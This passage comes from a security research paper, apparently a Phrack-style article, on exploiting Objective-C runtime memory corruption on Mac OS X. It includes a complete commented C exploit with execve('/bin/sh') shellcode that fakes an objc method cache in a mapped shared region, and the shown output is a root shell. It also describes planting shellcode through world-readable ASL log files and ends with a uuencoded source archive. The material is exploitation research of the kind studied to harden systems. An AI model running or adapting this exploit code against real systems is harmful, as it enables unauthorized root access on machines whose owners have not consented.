+value of the selector the end result for the index will be 0. This way we
+can stick the pointer from the selector we want to support (taken from ecx
+in objc_msgSend.) at this position, and force a match. This will result in
+the IMP being called. We point the imp at our shellcode below our cache
+pointer and gain control of execution.
+
+Phew, glad that explanation is out of the way, now to show it in code,
+which is much much easier to understand. Before we begin to actually write
+the code though, we need to retrieve the value of the selector, so we can 
+use it in our code.
+
+In order to do this, we stick a breakpoint on our objc_msgSend() call in
+gdb and run the program again.
+
+(gdb) break *0x00001f83 
+Breakpoint 1 at 0x1f83
+(gdb) r AAAAAAAAAAAAAAAAAAAAA
+Starting program: /Users/dcbz/code/ofex1/build/hello AAAAAAAAAAAAAAAAAAAAA
+buf: 0x103230
+talker: 0x103270
+
+Breakpoint 1, 0x00001f83 in main ()
+(gdb) x/i $pc
+0x1f83 <main+194>:      call   0x400a <dyld_stub_objc_msgSend>
+(gdb) stepi
+0x0000400a in dyld_stub_objc_msgSend ()
+(gdb) 
+0x94e0c670 in objc_msgSend ()
+(gdb) 
+0x94e0c674 in objc_msgSend ()
+(gdb) s
+0x94e0c678 in objc_msgSend ()
+(gdb) x/s $ecx
+0x1fb6 <main+245>:       "say:"
+
+As you can see, the address of our selector is 0x1fb6.
+
+(gdb) info share $ecx
+  2 hello                 - 0x1000            exec Y Y
+/Users/dcbz/code/ofex1/build/hello (offset 0x0)
+
+If we get some information on the mapping this came from we can see it was
+directly from our binary itself. This address is going to be static each
+time we run it, so it's acceptable to use this way. 
+
+Ok now that we've got all our information intact, I'll walk through a 
+finished exploit for this.
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <mach/vm_prot.h>
+#include <mach/i386/vm_types.h>
+#include <mach/shared_memory_server.h>
+#include <string.h>
+#include <unistd.h>
+
+#define BASE_ADDR 0x9ffff000
+#define PAGESIZE  0x1000
+#define SYS_shared_region_map_file_np 295
+
+We're going to map our data, at the page 0x9ffff000-0xa0000000 this way
+we're guaranteed that we'll have an address free of NULL bytes.
+
+char nemox86exec[] = 
+// x86 execve() code / nemo
+"\x31\xc0\x50\xb0\xb7\x6a\x7f\xcd"
+"\x80\x31\xc0\x50\xb0\x17\x6a\x7f"
+"\xcd\x80\x31\xc0\x50\x68\x2f\x2f"
+"\x73\x68\x68\x2f\x62\x69\x6e\x89"
+"\xe3\x50\x54\x54\x53\x53\xb0\x3b"
+"\xcd\x80";
+ 
+
+I'm using some simple execve("/bin/sh") shellcode for this. But obviously
+this is just for local vulns.
+
+
+struct _shared_region_mapping_np {
+        mach_vm_address_t       address;
+        mach_vm_size_t          size;
+        mach_vm_offset_t        file_offset;
+        vm_prot_t               max_prot;   /* read/write/execute/COW/ZF */
+        vm_prot_t               init_prot;  /* read/write/execute/COW/ZF */
+};
+
+struct cache_entry {
+    char *name;     // same layout as struct old_method
+    void *unused;
+    void (*imp)();  // same layout as struct old_method
+};
+
+struct objc_cache {
+    unsigned int mask;            /* total = mask + 1 */
+    unsigned int occupied;
+    struct cache_entry *buckets[1];
+};
+
+struct our_fake_stuff {
+	struct objc_cache fake_cache;
+	char filler[32 - sizeof(struct objc_cache)];
+	struct objc_cache *fake_cache_ptr;
+};
+
+We define our structs here. I created a "our_fake_stuff" struct in order to
+hold the main body of our exploit. I guess I should have stuck the
+objc_cache struct we're using in here. But I'm not going to go back and
+change it now... ;p
+
+#define ROOTFILE "/Applications/.localized"
+
+This is the file which we're using to store our data before we load it into
+the shared section.
+
+int main(int ac, char **av)
+{
+	int fd;
+	struct _shared_region_mapping_np sr;
+	char data[PAGESIZE];
+	char *ptr = data + PAGESIZE - sizeof(nemox86exec) - sizeof(struct our_fake_stuff) - sizeof(struct objc_cache);
+	long knownaddress;
+	struct our_fake_stuff ofs;
+	struct cache_entry bckt;
+	#define EVILSIZE 69
+	char badbuff[EVILSIZE];
+	char *args[] = {"./build/hello",badbuff,NULL};
+	char *env[]  = {"TERM=xterm",NULL};
+
+So basically I create a char[] buff PAGESIZE in size where I store
+everything I want to map into the shared section. Then I write the whole
+thing to a file. args and env are used when I execve the vulnerable
+program.
+	
+	printf("[+] Opening root owned file: %s.\n", ROOTFILE);
+	if((fd=open(ROOTFILE,O_RDWR|O_CREAT))==-1)
+	{
+		perror("open");
+		exit(EXIT_FAILURE);
+	}
+
+I open the root owned file...
+
+	// fill our data buffer with nops. Why? Why not!
+	memset(data,'\x90',sizeof(data));
+
+	knownaddress = BASE_ADDR + PAGESIZE - sizeof(nemox86exec) - 
+	sizeof(struct our_fake_stuff) - sizeof(struct objc_cache);
+
+knownaddress is a pointer to the start of our data. We position all our
+data towards the end of the mapping to reduce the chance of NULL bytes.
+
+	ofs.fake_cache.mask       = 0x0;        // mask = 0 
+	ofs.fake_cache.occupied   = 0xcafebabe; // occupied
+	ofs.fake_cache.buckets[0] = knownaddress + sizeof(ofs);
+
+The ofs struct is set up according to the method documented above. The mask
+is set to 0, so that our index ends up becoming 0. Occupied can be any
+value, I set it to 0xcafebabe for fun. Our buckets pointer basically just
+points straight after itself. This is where our cache_entry struct is going
+to be stored.
+
+	bckt.name   = (char *)0x1fb6; // our SEL
+	bckt.unused = (void *)0xbeef; // unused
+	bckt.imp    = (void (*)())(knownaddress + 
+			sizeof(struct our_fake_stuff) + 
+			sizeof(struct objc_cache)); // our shellcode
+
+Now we set up the cache_entry struct. Name is set to our selector value
+which we noted down earlier. Unused can be set to anything. Finally imp is
+set to the end of both of our structs. This function pointer will be called
+by the objective-c runtime, after our structs are processed. 
+
+	// set our filler to "A", who cares.
+	memset(ofs.filler,'\x41',sizeof(ofs.filler));
+	ofs.fake_cache_ptr = (struct objc_cache *)knownaddress;
+
+Next, we fill our filler with "A", this can be anything, it's just a pad so
+that our fake_cache_ptr will be 32 bytes from the start of our ISA struct.
+Our fake_cache_ptr is set up to point back to the start of our data
+(knownaddress). This way our fake_cache struct is processed by the runtime.
+
+	// stick our struct in data.
+	memcpy(ptr,&ofs,sizeof(ofs));
+	// stick our cache entry after that
+	memcpy(ptr+sizeof(ofs),&bckt,sizeof(bckt));
+	// stick our shellcode after our struct in data.
+	memcpy(ptr+sizeof(ofs)+sizeof(bckt),nemox86exec
+		,sizeof(nemox86exec));
+
+Now that our structs are set up, we simply memcpy() each of them into the
+appropriate position within the data[] blob....
+
+	printf("[+] Writing out data to file.\n");
+	if(write(fd,data,PAGESIZE) != PAGESIZE)
+	{
+		perror("write");
+		exit(EXIT_FAILURE);
+	}
+
+... And write this out to our file.
+
+	sr.address     = BASE_ADDR;
+	sr.size        = PAGESIZE;
+	sr.file_offset = 0;
+	sr.max_prot    = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE;
+	sr.init_prot   = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE; 
+
+	printf("[+] Mapping file to shared region.\n");
+
+	if(syscall(SYS_shared_region_map_file_np,fd,1,&sr,NULL)==-1)
+	{
+		perror("shared_region_map_file_np");
+		exit(EXIT_FAILURE);
+	}
+
+
+	close(fd);
+
+Our file is then mapped into the shared region, and our fd discarded.
+
+	printf("[+] Fake Objective-C chunk at: 0x%x.\n", knownaddress);
+
+	memset(badbuff,'\x41',sizeof(badbuff));
+	//knownaddress = 0xcafebabe;
+	badbuff[sizeof(badbuff) - 1] = 0x0;
+	badbuff[sizeof(badbuff) - 2] = (knownaddress & 0xff000000) >> 24;
+	badbuff[sizeof(badbuff) - 3] = (knownaddress & 0x00ff0000) >> 16;
+	badbuff[sizeof(badbuff) - 4] = (knownaddress & 0x0000ff00) >>  8;
+	badbuff[sizeof(badbuff) - 5] = (knownaddress & 0x000000ff) >>  0;
+	printf("[+] Executing vulnerable app.\n");
+
+Before finally we set up our badbuff, which will be argv[1] within our
+vulnerable application. knownaddress (The address of our data now stored
+within the shared region.) is used as the ISA pointer.
+
+	execve(*args,args,env);
+
+	// not reached.
+	exit(0);
+}
+
+For your convenience I will include a copy of this exploit/vuln along with
+most of the other code in this paper, uuencoded at the end.
+
+As you can see from the following output, running our exploit works as
+expected. We're dropped to a shell. (NOTE: I chown root;chmod +s'ed the
+build/hello file for effect.)
+
+-[dcbz@megatron:~/code/ofex1]$ ./exploit 
+[+] Opening root owned file: /Applications/.localized.
+[+] Writing out data to file.
+[+] Mapping file to shared region.
+[+] Fake Objective-C chunk at: 0x9fffffa5.
+[+] Executing vulnerable app.
+buf: 0x103500
+talker: 0x103540
+bash-3.2# id
+uid=0(root)
+
+Hopefully in this section I have provided a viable method of exploiting
+heap overflows in an Objective-c Environment.
+
+Another technique revolving around overflowing Objective-C meta-data is an
+overflow on the .bss section. This section is used to store static/global
+data that is initially zero filled.
+
+Generally with the way gcc lays out the binary, the __class section comes
+straight after the .bss section. This means that a largish overflow on the
+.bss will end up overwriting the isa class definition structs, rather than
+the instantiated classes themselves, as in the previous example.
+
+In order to test out what will happen we can modify our previous example to
+move buf from the heap to the .bss. I also changed the printf responsible
+for printing the address of the Talker class, to deref the first element
+and print the address of it's isa instead.
+
+#include <stdio.h>
+#include <stdlib.h>
+#import "Talker.h"
+
+char buf[25];
+
+int main(int ac, char **av) 
+{
+        Talker *talker = [[Talker alloc] init];
+        printf("buf: 0x%x\n",buf);
+        printf("talker isa: 0x%x\n",*(long *)talker);
+        if(ac != 2) {
+                exit(1);
+        }
+        strcpy(buf,av[1]);
+        [talker say: "Hello World!"];
+        [talker release];
+}
+
+When we compile this and run it in gdb, we can see a couple of things.
+Firstly, that the talkers isa struct is only around 4096 bytes apart from
+our buffer. 
+
+(gdb) r `perl -e'print "A"x4150'`
+Starting program: /Users/dcbz/code/ofex2/build/hello `perl -e'print
+"A"x4150'`
+Reading symbols for shared libraries +++++...................... done
+buf: 0x2040
+talker isa: 0x3000
+
+We also get a crash in the following instruction:
+
+Program received signal EXC_BAD_ACCESS, Could not access memory.
+Reason: KERN_INVALID_ADDRESS at address: 0x41414141
+0x94e0c68c in objc_msgSend ()
+(gdb) x/i $pc
+0x94e0c68c <objc_msgSend+28>:   mov    0x0(%edi),%esi
+(gdb) i r edi
+edi            0x41414141       1094795585
+
+This instruction looks pretty familiar from our previous example.
+As you can guess, this instruction is looking up the cache pointer, exactly
+the same as our previous example. The only real difference is that we're
+skipping a step. Rather than overflowing the ISA pointer and then creating
+a fake ISA struct, we simply have to create a fake cache in order to gain
+control of execution.
+
+I'm not going to bother playing this one out for you guys in the paper,
+cause this monster is already getting quite long as it is. I'll include the
+sample code in the uuencoded section at the end though, feel free to play
+with it.
+
+As you can imagine, you simply need to set up memory as such:
+
+       ,_____________________,
+       |        mask=0       |   
+       |      occupied       |   
+   ,---|      buckets        |    
+   '-->| fake bucket: SEL    |   
+       | fake bucket: unused |   
+       | fake bucket: IMP    |-----,
+       |     SHELLCODE       |<----'
+       '_____________________'
+
+and point edi to the start of it to gain control of execution.
+
+These two techniques provide some of the easiest ways to gain control of
+execution from a heap or .bss overflow that i've seen on Mac OS X.
+
+The last type of bug which I will explore in this paper, is the double 
+"release". This is a double free of an Objective-C object.
+
+The following code demonstrates this situation.
+
+#include <stdio.h>
+#include <stdlib.h>
+#import "Talker.h"
+
+
+int main(int ac, char **av)
+{
+        Talker *talker = [[Talker alloc] init];
+        printf("talker: 0x%x\n",talker);
+        printf("Talker is: %i bytes.\n", sizeof(Talker));
+        if(ac != 2) {
+                exit(1);
+        }
+        char *buf  = strdup(av[1]);
+        printf("buf @ 0x%x\n",buf);
+        [talker say: "Hello World!"];
+        [talker release];	// Free
+        [talker release];	// Free again...
+}
+
+If we compile and execute this code in gdb, the following situation occurs:
+
+
+-[dcbz@megatron:~/code/p66-objc/ofex3]$ gcc Talker.m hello.m
+-framework Foundation -o hello
+-[dcbz@megatron:~/code/p66-objc/ofex3]$ gdb ./hello
+GNU gdb 6.3.50-20050815 (Apple version gdb-768) 
+Copyright 2004 Free Software Foundation, Inc.
+
+(gdb) r AA
+Starting program: /Users/dcbz/code/p66-objc/ofex3/hello AA
+talker: 0x103280
+Talker is: 4 bytes.
+buf @ 0x1032d0
+Hello World!
+objc[1288]: FREED(id): message release sent to freed object=0x103280
+
+Program received signal EXC_BAD_INSTRUCTION, Illegal instruction/operand.
+0x90c65bfa in _objc_error ()
+(gdb) x/i $pc
+0x90c65bfa <_objc_error+116>:   ud2a   
+(gdb) 
+
+This ud2a instruction is guaranteed to throw an Illegal instruction and
+terminate the process. This is Apple's protection against double releases.
+
+If we look at what's happening in the source we can see why this occurs.
+
+__private_extern__ IMP _class_lookupMethodAndLoadCache(Class cls, SEL sel)
+{
+    Class curClass;
+    IMP methodPC = NULL;
+
+    // Check for freed class
+    if (cls == _class_getFreedObjectClass())
+        return (IMP) _freedHandler;
+
+As you can see, when the lookupMethodAndLoadCache function is called, 
+(when the release method is called) the cls pointer is compared with the
+result of the _class_getFreeObjectClass() function. This function returns
+the address of the previous class which was released by the runtime. If a
+match is found, the _freedHandler function is returned, rather than the
+desired method implementation. _freedHandler is responsible for outputting
+a message in syslog() and then using the ud2a instruction to terminate the
+process.
+
+This means that any method call on a free()'ed object will always
+error out. However, if another object is released inbetween, the behaviour
+is different.
+
+To investigate this we can use the following program:
+
+#include <stdio.h>
+#include <stdlib.h>
+#import "Talker.h"
+
+
+int main(int ac, char **av)
+{
+        Talker *talker = [[Talker alloc] init];
+        Talker *talker2 = [[Talker alloc] init];
+        printf("talker: 0x%x\n",talker);
+        printf("talker is: %i bytes.\n", malloc_size(talker));
+        if(ac != 2) {
+                exit(1);
+        }
+        [talker release];
+        [talker2 release];
+        int i;
+        for(i=0; i<=50000 ; i++) {
+                char *buf  = strdup(av[1]);
+        //printf("buf @ 0x%x\n",buf);
+                // leak badly
+        }
+        [talker say: "Hello World!"];
+        [talker release];
+}
+
+If we run this, with gdb attached, we can see that it crashes in the
+following instruction.
+
+(gdb) r aaaa
+The program being debugged has been started already.
+Start it from the beginning? (y or n) y
+Starting program: /Users/dcbz/code/p66-objc/ofex3/hello aaaa
+talker: 0x103280
+talker is: 16 bytes.
+
+Program received signal EXC_BAD_ACCESS, Could not access memory.
+Reason: KERN_INVALID_ADDRESS at address: 0x61616181
+0x90c75688 in objc_msgSend ()
+(gdb) x/i $pc
+0x90c75688 <objc_msgSend+24>:   mov    edi,DWORD PTR [edx+0x20]
+
+As you can see, this instruction (objc_msgSend+24) is our objc_msgSend call 
+trying to look up the cache pointer from our object. The ISA pointer in edx
+contains the value 61616161 ("aaaa"). This is because our little for loop
+of heap allocations, eventually filled in the gaps in the heap, and
+overwrote our free'ed object. 
+
+Once we control the ISA pointer in this instruction, the situation is again
+identical to a standard heap overflow of an Objective-C object.
+
+I will leave it again as an exercize for the reader to implement this.
+
+------[ 6.1 - Side note: Updated shared_region technique.
+
+In the previous section we used the shared_region technique to store our
+code in a fixed location in the address space of our vulnerable
+application. However, in order to do so, we required a file that was owned
+by root and controllable/readable by us. 
+
+The file that we used:
+
+8 -rw-rw-r--  1 root  admin  4096 Apr 12 17:30 /Applications/.localized
+
+Was only writeable by the admin user, so this isn't really a viable
+solution to the problem apple presented us with.
+
+As I said earlier, I've been away from Mac OS X for a while, so I haven't
+had a chance to get around this new check, in the past. While I was writing
+this paper I was contemplating possible methods of defeating it.
+
+My first thought, was to find a suid which created a root owned file,
+controllable by us, and then sigstop it. However I did not find any suids
+which met our requirements with this.
+
+I also tried mounting a volume obeying file ownership which contained a
+previously created root owned file. However there is a check in the syscall
+which makes sure that our file is on the root volume, so that was outed.
+
+Finally I thought about log files. Something like syslog would be perfect
+where I could arbitrarily control the contents. The only problem with this
+idea is that no one in their right mind would allow their syslog to be
+world readable.
+
+This is when I stumbled across the "Apple system log facility." A.S.L?
+Amazingly apple took it upon themselves to reinvent the wheel. Apple syslog
+is designed to be readable by everyone on the system. By default any user
+can see sudo messages etc.
+
+The man page describes ASL as follows:
+
+DESCRIPTION
+
+These routines provide an interface to the Apple system log facility.  They
+are intended to be a replacement for the syslog(3) API, which will continue
+to be supported for backwards compatibility.  The new API allows client
+applications to create flexible, structured messages and send them to the
+syslogd server, where they may undergo additional processing.  Messages
+received by the server are saved in a data store (subject to input filtering
+constraints).  This API permits clients to create queries and search the
+message data store for matching messages.
+
+There's even a section on security that seems to think allowing everyone to
+view your system log is a good thing...
+
+SECURITY
+
+Messages that are sent to the syslogd server may be saved 
+in a message store.  The store may be searched using asl_search, as 
+described below.  By default, all messages are readable by any user.
+However, some applications may wish to restrict read access for some 
+messages.  To accommodate this, a client may set a value for the "ReadUID" 
+and "ReadGID" keys.  These keys may be associated with a value
+containing an ASCII representation of a numeric UID or GID.  Only the 
+root user (UID 0), the user with the given UID, or a member of the group with  
+the given GID may fetch access-controlled messages from the database.
+
+So basically we can use the "asl_log()" function to add arbitrary data to
+the log file. The log file is stored in /var/log/asl/YYYY.MM.DD.asl and as
+you can see below this file is world readable. This works perfect for what
+we need.
+
+344 -rw-r--r--  1 root  wheel  172377 Apr 12 18:40
+/var/log/asl/2009.04.12.asl
+
+I wrote a tool "14-f-brazil.c" which basically takes some shellcode in
+argv[1] then sends it to the latest asl log with asl_log(). It then maps
+the last page of the log file straight into the shared section.
+
+I stuck a unique identifier:
+
+        #define NEMOKEY "--((NEMOKEY))--:>>"
+
+before the shellcode in memory, and then just scanned memory in the shared
+mapping in the current process in order to locate the key, and therefore 
+our shellcode.
+
+Here is the output from running the program:
+
+-[dcbz@megatron:~/code]$ ./14-f-brazil `perl -e'print "\xcc"x20'`
+[+] opening logfile: /var/log/asl/2009.04.12.asl.
+[+] generating shellcode buffer to log.
+[+] writing shellcode to logfile.
+[+] creating shared mapping.
+[+] file offset: 0x16000
+[+] Waiting a bit.
+[+] scanning memory for the shellcode... (this may crash).
+[+] found shellcode at: 0x9ffff674.
+
+
+And as you can see in gdb, we have a nopsled at that address.
+
+-[dcbz@megatron:~/code]$ gdb /bin/sh
+GNU gdb 6.3.50-20050815 (Apple version gdb-768) 
+
+(gdb) r
+Starting program: /bin/sh
+^C[Switching to process 342 local thread 0x2e1b]
+0x8fe01010 in __dyld__dyld_start () 
+Quit
+(gdb) x/x 0x9ffff674
+0x9ffff674:     0x90909090
+(gdb)
+0x9ffff678:     0x90909090  
+(gdb)
+0x9ffff67c:     0x90909090
+(gdb)
+0x9ffff680:     0x90909090
+(gdb)
+0x9ffff684:     0x90909090
+
+Andrewg predicts that after this paper Apple will add a check to make sure
+that the file is executable, prior to mapping it into the shared section.
+
+Should be interesting to see if they do this. :p
+
+I'll include 14-f-brazil.c in the uuencoded code at the end of this paper.
+
+--[ 6 - Conclusion
+
+Wow I can't believe you guys actually read this far. That was a pretty long
+and painful ride. It seems like every time I start writing I remember how much I
+dislike writing and vow never to do it again, but after a few months I
+always forget and start on another topic. Hopefully this wasn't as dry and
+boring in .txt format as it was in .ppt, although I'm definitly missing
+lolcat pictures in this version :(.
+
+I would like to take this time to thank the support drone at the Apple shop
+who fixed my Macbook for me after it was broken for the last 3 years.
+Without his help, there's no way I would have ever finished this paper.
+
+Again I'd like to thank my wife for her support.  Also thanks to
+cloudburst/andrewg and the rest of felinemenace as well as various other
+people for discussing this stuff with me and allowing me to bounce ideas
+off you, TEAM HANZO reprezent! Thanks to dino and thoth for reading over 
+the paper before I published it, to make sure I didn't say anything TOO 
+stupid. ;-)
+
+Anyone interested enough to read this far should definitly check out the
+Mac Hacker's Handbook. I haven't as of yet been able to buy a copy, I guess
+they're all sold out in Australia, but from what I've seen so far the book
+looks great.
+
+later!
+
+- nemo
+
+--[ 7 - References
+
+[1] -
+http://developer.apple.com/documentation/Cocoa/Conceptual/ObjectiveC/  \
+                       Introduction/introObjectiveC.html
+[2] - 
+http://en.wikipedia.org/wiki/Objective-C
+
+[3] - Compiling Objective-C without xcode on OS X.
+http://www.w3style.co.uk/compiling-objective-c-without-xcode-in-os-x
+
+[4] -  CLOS: Integrating object-orientated and functional programming.
+http://portal.acm.org/citation.cfm?doid=114669.114671
+
+[5] - Objective-C Runtime Source.
+http://www.opensource.apple.com/darwinsource/tarballs/apsl/objc4-371.2.tar.gz
+
+[6] - Mach-O File Format
+http://developer.apple.com/documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html
+
+[7] - The Objective-C Runtime 2.0:
+http://developer.apple.com/DOCUMENTATION/Cocoa/Reference/ObjCRuntimeRef/ObjCRuntimeRef.pdf
+
+[8] - The Objective-C Runtime 1.0:
+http://developer.apple.com/DOCUMENTATION/Cocoa/Reference/ObjCRuntimeRef1/ObjCRuntimeRef1.pdf
+
+[9] - Objective-C Runtime Guide:
+http://developer.apple.com/DOCUMENTATION/Cocoa/Conceptual/ObjCRuntimeGuide/ObjCRuntimeGuide.pdf
+
+[10] - Objective-C Beginner's Guide
+http://www.otierney.net/objective-c.html
+
+[11] - OS X heap exploitation techniques  
+http://www.phrack.com/issues.html?issue=63&id=5
+
+[12] - Mac OS X Debugging Magic
+http://developer.apple.com/technotes/tn2004/tn2124.html
+
+[13] - Mac OS X wars - a XNU Hope
+http://www.phrack.com/issues.html?issue=64&id=11#article
+
+[14] - class-dump
+http://www.codethecode.com/projects/class-dump
+
+[15] - OTX 
+http://otx.osxninja.com/
+
+[16] - fixobjc.idc
+http://nah6.com/~itsme/cvs-xdadevtools/ida/idcscripts/fixobjc.idc
+
+[17] - Charlie Miller - Owning the fanboys
+http://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Miller/BlackHat-Japan-08-Miller-Hacking-OSX.pdf
+
+[18] - F-Script
+http://www.fscript.org
+
+[19] - Reverse engineering - PowerPC Cracking on OSX with GDB
+http://phrack.org/issues.html?issue=63&id=16#article
+
+[20] - HTE
+http://hte.sourceforge.net
+
+--[ 8 - Appendix A: Source code
+
+begin 644 p66-objc.tgz
+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
